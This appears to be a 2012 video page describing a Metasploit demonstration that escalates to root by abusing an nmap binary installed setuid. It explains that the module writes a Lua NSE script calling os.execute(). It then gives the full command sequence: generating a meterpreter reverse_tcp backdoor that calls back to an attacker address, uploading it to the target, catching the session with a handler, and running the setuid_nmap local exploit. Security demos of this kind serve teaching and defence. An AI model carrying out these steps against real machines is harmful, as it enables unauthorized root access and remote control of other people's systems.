Setuid Nmap Exploit Metasploit Demo

Blog : http://eromang.zataz.comTwitte... : http://twitter.com/eromangTime... :Metasploit PoC provided the 2012-06-13PoC provided by:egyptReference(s) :NoneAffected versions :All Nmap versions with setuidTested on CentOS release 6.2 with Nmap 6.01Description :Nmap's man page mentions that "Nmap should never be installed with special privileges (e.g. suid root) for security reasons.." and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.Metasploit demo :You will require to have an active session on the target, this session could be done through a backdoor.sudo msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.178.100 XUpload the backdoor on the targetuse exploit/multi/handlerset PAYLOAD linux/x86/meterpreter/reverse_tcpset LHOST 192.168.178.100exploit -jsysinfogetuiduse exploit/unix/local/setuid_nmapset Nmap /usr/local/bin/nmapset SESSION 1set TARGET 1set PAYLOAD linux/x86/meterpreter/reverse_tcpset LHOST 192.168.178.100exploitsysinfogetuid

Channel: Science & Technology
Uploaded: August 19, 2012 at 7:03 am
Author: WOW ZATAZ

Length: 03:34
Rating: 5.0
Views: 605

Tags:  

Video Comments